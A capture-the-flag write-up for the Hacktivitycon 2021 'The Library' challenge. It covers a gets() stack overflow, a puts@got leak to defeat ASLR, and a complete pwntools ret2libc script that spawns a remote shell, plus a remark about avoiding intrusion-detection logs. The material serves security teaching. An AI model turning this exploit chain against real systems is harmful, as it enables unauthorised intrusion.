Hacktivitycon CTF 2021 - The Library

"The Library" is a binary exploitation challenge in Hacktivitycon CTF 2021. You can download the challenge file here and the libc here.

Static + Dynamic Analysis

<cjason@cj-basepc:library>>$ pwn checksec the_library
[!] Could not populate PLT: The 'unicorn<1.0.2rc4,>=1.0.2rc1' distribution was not found and is required by pwntools
[*] '/home/cjason/ctfs/hacktivity/pwn/library/the_library'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

<cjason@cj-basepc:library>>$ r2 the_library
WARNING: No calling convention defined for this file, analysis may be inaccurate.
 -- Here be dragons.
[0x00401190]> aaa
[Warning: set your favourite calling convention in `e anal.cc=?`
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00401190]> afl
0x00401190    1 47           entry0
0x004011d0    4 33   -> 31   sym.deregister_tm_clones
0x00401200    4 49           sym.register_tm_clones
0x00401240    3 33   -> 32   sym.__do_global_dtors_aux
0x00401270    1 6            entry.init0
0x004014a0    1 5            sym.__libc_csu_fini
0x004014a8    1 13           sym._fini
0x00401430    4 101          sym.__libc_csu_init
0x004011c0    1 5            sym._dl_relocate_static_pie
0x004012a9    9 384          main
0x00401000    3 27           sym._init
0x00401276    1 51           sym.setup
0x00401110    1 11           sym.imp.setbuf
0x004010e0    1 11           sym.imp.puts
0x004010f0    1 11           sym.imp.fread
0x00401100    1 11           sym.imp.fclose
0x00401120    1 11           sym.imp.printf
0x00401130    1 11           sym.imp.srand
0x00401140    1 11           sym.imp.gets
0x00401150    1 11           sym.imp.fopen
0x00401160    1 11           sym.imp.atoi
0x00401170    1 11           sym.imp.exit
0x00401180    1 11           sym.imp.rand

Similar to Retcheck, no stack protection or PIE is enabled. One important thing to note is that this is a 64-bit binary, so methods pertaining to 32-bit binary does not apply here because the way functions are called in 64-bit binary is very different compared to 32-bit binary. In a 32-bit binary, arguments are placed on a stack; in 64-bit binary, arguments are placed in registers.

De-compiled sym.main using r2ghidra:

undefined8 main(void)
{
    int32_t iVar1;
    int64_t var_220h;
    int64_t var_18h;
    uint32_t var_10h;
    undefined8 var_4h;

    _var_10h = 0;
    _var_10h = sym.imp.fopen("/dev/urandom", 0x4020ba);
    if (_var_10h == 0) {
        sym.imp.exit(1);
    }
    sym.imp.fread(&var_18h, 4, 1);
    sym.imp.fclose(_var_10h);
    sym.imp.srand((undefined4)var_18h);
    sym.imp.puts("Welcome to The Library.\n");
    sym.imp.puts("Books:");
    for (var_4h._0_4_ = 0; (int32_t)var_4h < 6; var_4h._0_4_ = (int32_t)var_4h + 1) {
        sym.imp.printf("%d. %s\n", (int32_t)var_4h + 1, *(undefined8 *)(obj.BOOKS + (int64_t)(int32_t)var_4h * 8));
    }
    sym.imp.puts(0x4020f1);
    sym.imp.puts("I am thinking of a book.");
    sym.imp.puts("Which one is it?");
    sym.imp.printf(0x40211c);
    sym.imp.gets(&var_220h);
    var_18h._4_4_ = sym.imp.atoi(&var_220h);
    iVar1 = sym.imp.rand();
    if (var_18h._4_4_ == iVar1 % 5 + 1) {
        sym.imp.puts("Correct!");
    }
    else {
        sym.imp.puts("Wrong :(");
    }
    return 0;
}

The gets function causes main to be vulnerable to buffer overflow. Now we just need to find the offset to overwrite the return address. In Retcheck, we used a cyclic pattern to find the offset. Let's try a different approach here, where we try to compute the offset by analyzing the rbp offsets of var_220h.

[0x004012a9]> pdf
            ; DATA XREF from entry0 @ 0x4011b1
┌ 384: main ();
│           ; var int64_t var_220h @ rbp-0x220
│           ; var int64_t var_18h @ rbp-0x18
│           ; var uint32_t var_14h @ rbp-0x14
│           ; var uint32_t var_10h @ rbp-0x10
│           ; var signed int64_t var_4h @ rbp-0x4

...

var_220h is located at 544 locations from rbp. We know that rbp+0x8 is the location of the return address. Thus, we can compute the offset by adding 8 to 544, which gets us to 552. To confirm this, we will need to run the binary with inputs python -c 'print("A"*552+"B"*8)'

<cjason@cj-basepc:library>>$ gdb the_library
GNU gdb (GDB) 10.2
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 190 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from the_library...
(No debugging symbols found in the_library)
pwndbg> r < <(python -c 'print("A"*552+"B"*8)')
Starting program: /home/cjason/ctfs/hacktivity/pwn/library/the_library < <(python -c 'print("A"*552+"B"*8)')
Welcome to The Library.

Books:
1. Sandworm
2. Little Brother
3. Breaking and Entering: The Extraordinary Story of a Hacker Called Alien
4. Hacking: The Art of Exploitation
5. Countdown to Zero Day
6. Practical Malware Analysis

I am thinking of a book.
Which one is it?
> Wrong :(

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401428 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x401430 (__libc_csu_init) ◂— endbr64
 RCX  0x7ffff7eb6907 (write+23) ◂— cmp    rax, -0x1000 /* 'H=' */
 RDX  0x0
 RDI  0x7ffff7f8a4d0 (_IO_stdfile_1_lock) ◂— 0x0
 RSI  0x7ffff7f885a3 (_IO_2_1_stdout_+131) ◂— 0xf8a4d0000000000a /* '\n' */
 R8   0x9
 R9   0x7ffff7f870a0 (pa_next_type) ◂— 0x8
 R10  0x7ffff7f39ac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000
 R11  0x246
 R12  0x401190 (_start) ◂— endbr64
 R13  0x0
 R14  0x0
 R15  0x0
 RBP  0x4141414141414141 ('AAAAAAAA')
 RSP  0x7fffffffdfd8 ◂— 'BBBBBBBB'
 RIP  0x401428 (main+383) ◂— ret
─────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────
 ► 0x401428 <main+383>    ret    <0x4242424242424242>

The ret <0x4242424242424242> confirms both the vulnerability and our offset of 552. Now let's think about how can we exploit this. There are no obvious functions that we can abuse in the binary, neither does any of the functions in PLT consist of ways we can use to pop a shell or get a flag. We also cannot inject shellcode onto the stack because of the NX bit is set; data on the stack is not executable. We are left with 1 option that is to perform a "return to libc attack" (informative read here).

Setting up linker to use challenge libc

In order to do that, we first need to test the binary with the libc that is used on the server. We are provided with a shared object file libc-2.31.so file for this challenge, which is presumably the libc used. The easiest way to achieve this is to obtain the correct linker script using pwninit. Ideally, we would need to download a linker script for the corresponding libc file, then set the interpreter of the binary to that in order to force the binary to use a libc that is not that of your system's. To use pwninit, simply do pwninit --no-template, which will automatically download the linker script, perform ELF patching to set the interpreter (we do not want it to create an exploit template because we will write our own here).

If everything works, we should see the following output when we run ld on the patched binary file. Notice the original binary uses the system's libc (/usr/lib/libc.so.6) while the patched binary uses the libc in the working directory.

<cjason@cj-basepc:library>>$ ldd ./the_library
        linux-vdso.so.1 (0x00007ffc6fbf3000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007fe332d5c000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fe332f5c000)
<cjason@cj-basepc:library>>$ ldd ./the_library_patched
        linux-vdso.so.1 (0x00007ffdefd04000)
        libc.so.6 => ./libc.so.6 (0x00007f3fa9425000)
        ./ld-2.31.so => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f3fa9619000)

Leaking base address of libc

Now, even-though PIE is not enabled, the address of libc is still randomized. This is due to a mechanism known as ASLR or address space layout randomization. This means that even though the address offset of individual functions on libc can be determined easily by databases like this one, the base address in which libc is loaded into is random enough that we cannot afford to try and guess and hope to be lucky.

Before we can "return to libc", we first need to leak the base address of libc. We can do that by printing an address of a function on the GOT or global offset table. In simple terms, for dynamically linked functions, the actual address of the function is not known at compile time. So, the compiler creates "placeholders" functions or PLT. The function in PLT merely jumps to addresses defined by the GOT, which contains the actual address of the functions of the library during runtime. So, if we know the value in the GOT, we would be able to know the base address of libc given the offset of the function!

Thus, let's formulate a method to leak values in GOT:

Place the address of a function defined by the GOT onto a register.
call a function that prints something.

I choose puts as a function to leak and print. puts only require 1 argument, that is the variable to print. According to x64 calling conventions, we would need to place the address of puts@got onto rdi. To build our payload, we first need to find a what is known as a "gadget" which will put values into rdi and then return. Using ROPGadget in pwndbg makes this easy:

pwndbg> rop --grep "pop rdi"
0x0000000000401493 : pop rdi ; ret

Next, we will need the function address of puts@plt and puts@got. We are using puts@plt to leak puts@got. Let's find this 2 addresses in gdb.

pwndbg> info functions
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010e0  puts@plt
0x00000000004010f0  fread@plt
0x0000000000401100  fclose@plt
0x0000000000401110  setbuf@plt
0x0000000000401120  printf@plt
0x0000000000401130  srand@plt
0x0000000000401140  gets@plt
0x0000000000401150  fopen@plt
0x0000000000401160  atoi@plt
0x0000000000401170  exit@plt
0x0000000000401180  rand@plt
0x0000000000401190  _start
pwndbg> info functions
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010e0  puts@plt
0x00000000004010f0  fread@plt
0x0000000000401100  fclose@plt
0x0000000000401110  setbuf@plt
0x0000000000401120  printf@plt
0x0000000000401130  srand@plt
0x0000000000401140  gets@plt
0x0000000000401150  fopen@plt
0x0000000000401160  atoi@plt
0x0000000000401170  exit@plt
0x0000000000401180  rand@plt
0x0000000000401190  _start
0x00000000004011c0  _dl_relocate_static_pie
0x00000000004011d0  deregister_tm_clones
0x0000000000401200  register_tm_clones
0x0000000000401240  __do_global_dtors_aux
0x0000000000401270  frame_dummy
0x0000000000401276  setup
0x00000000004012a9  main
0x0000000000401430  __libc_csu_init
0x00000000004014a0  __libc_csu_fini
0x00000000004014a8  _fini
pwndbg> disas 0x00000000004010e0
Dump of assembler code for function puts@plt:
   0x00000000004010e0 <+0>:     endbr64
   0x00000000004010e4 <+4>:     bnd jmp QWORD PTR [rip+0x2ead]        # 0x403f98 <puts@got.plt>
   0x00000000004010eb <+11>:    nop    DWORD PTR [rax+rax*1+0x0]
End of assembler dump.
pwndbg>

We got 0x4010e0 for puts@plt and 0x403f98 for puts@got. Finally let's consider the fact that when we insert this payload, the program would simply print the address of puts in libc, which allows us to find the base address. BUT, the program would simply terminate soon after, leaving no room for our actual payload! Thus, we would need to "restart" this program somehow (without exiting) so that in the second run, we would have known the base address of libc and ready to pop a shell.

To do this, let's just return the program to _start at address 0x401190. Thus, our first payload looks like this:

[ padding = b'A'* 552 ]
[ 0x401493            ]
[ 0x403f98            ]
[ 0x4010e0            ]
[ 0x401190            ]

If we feed this onto the program, we should expect 2 things. It should print out a long hex string, which is the address of puts in the loaded libc and it should once again prompt us for input. Let's try this out.

#!/usr/bin/python
# solve.py

from pwn import *

#conn = remote('challenge.ctf.games', 30384)
conn = process('./patched')

padding = b'A'* 552

# return to got
# dump address of puts@got
pop_rdi_ret = p64(0x401493)
puts_got = p64(0x403f98)
puts_plt = p64(0x4010e0)
ret2start = p64(0x401190)
payload = padding + pop_rdi_ret + puts_got + puts_plt + ret2start

r = conn.recvuntil(b'> ')
conn.sendline(payload)
conn.interactive()

Where "patched" is the patched binary. Running the script results in the following output:

<cjason@cj-basepc:library>>$ python solve.py
[+] Starting local process './patched': pid 35989
[*] Switching to interactive mode
Wrong :(
\xa0Ua\x94~\x7f
Welcome to The Library.

Books:
1. Sandworm
2. Little Brother
3. Breaking and Entering: The Extraordinary Story of a Hacker Called Alien
4. Hacking: The Art of Exploitation
5. Countdown to Zero Day
6. Practical Malware Analysis

I am thinking of a book.
Which one is it?
> $ 1
Wrong :(
[*] Process './patched' stopped with exit code 0 (pid 35989)
[*] Got EOF while reading in interactive
$

We see that right after the first "Wrong", we have \xa0Ua\x94~\x7f. The program then prompt us for input a second time, which we are able to answer and get greeted with a second "Wrong". Now, let's confirm that \xa0Ua\x94~\x7f is indeed the address for puts on libc. Converting it to hex (little endian) tells us that the address is 0x7f7e946155a0.

A quick check on the libc we have shows that we indeed got a match:

<cjason@cj-basepc:library>>$ strings libc-2.31.so | grep 2.3
GLIBC_2.3
GLIBC_2.3.2
GLIBC_2.3.3
GLIBC_2.3.4
GLIBC_2.30
glibc 2.31
NPTL 2.31
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.
libc-2.31.so

So, to calculate the base address, we would need to subtract the offset from the address of puts, which is 0x0875a0.

Final Payload

Now before we execute a return 2 libc attack, we need 2 more final ingredients. We need the offsets of the system function and a string that has "/bin/sh". As seen by the libc database, they are 0x55410 and 0x1b75aa respectively. Our second payload looks like this:

[ padding = b'A'* 552 ]
[ 0x401493 + 1        ] (ret;)
[ 0x401493            ] (pop rdi; ret;)
[ libcbase + 0x1b75aa ] (libc address of "/bin/sh")
[ libcbase + 0x055410 ] (libc address of system)
[ libcbase + 0x049bc0 ] (libc address of exit)

The last address calls libc's exit to allow the program to terminate gracefully when we exit the shell after doing our business. Without this, the program might crash which will leave some logs that alerts intrusion detection to our presence. Why do we need 0x401493 + 1, or an additional return instruction in our ROP chain? That's because the stack isn't properly aligned and this instruction movaps xmmword ptr [rsp + 0x50], xmm0 will cause a crash. To counteract this, we use an extra return instruction to align it properly (More details can be seen here).

import sys
import re
from pwn import *

conn = remote('challenge.ctf.games', 30384)

padding = b'A'* 552
pop_rdi_ret = p64(0x401493)
puts_got = p64(0x403f98)
puts_plt = p64(0x4010e0)
ret2start = p64(0x401190)
payload = padding + pop_rdi_ret + puts_got + puts_plt + ret2start

r = conn.recvuntil(b'> ')
conn.sendline(payload)

r = conn.recvline()
r = conn.recvline()
leaked_puts_got = (r.split(b'\n')[-2])
leaked_puts_got = u64(leaked_puts_got.ljust(8,b"\x00"))
libcbase = leaked_puts_got - 0x875a0
print(hex(libcbase))

align_s_16  = p64(0x401493+1)
pop_rdi_ret = p64(0x401493)
bin_sh_addr = p64(libcbase + 0x1b75aa)
lc_sys_addr = p64(libcbase + 0x055410)
exit_addr   = p64(libcbase + 0x49bc0)
payload = padding + align_s_16 + pop_rdi_ret + bin_sh_addr + lc_sys_addr + exit_addr

conn.sendline(payload)
conn.interactive()

Key Takeaways:

Easily "restart" a program by adding the address of _start or sym.main at the end of the ROP chain used to leak the libc address.
Ensure 16-byte stack alignment in x64 exploits by adding an ret instruction in beginning ROP chain.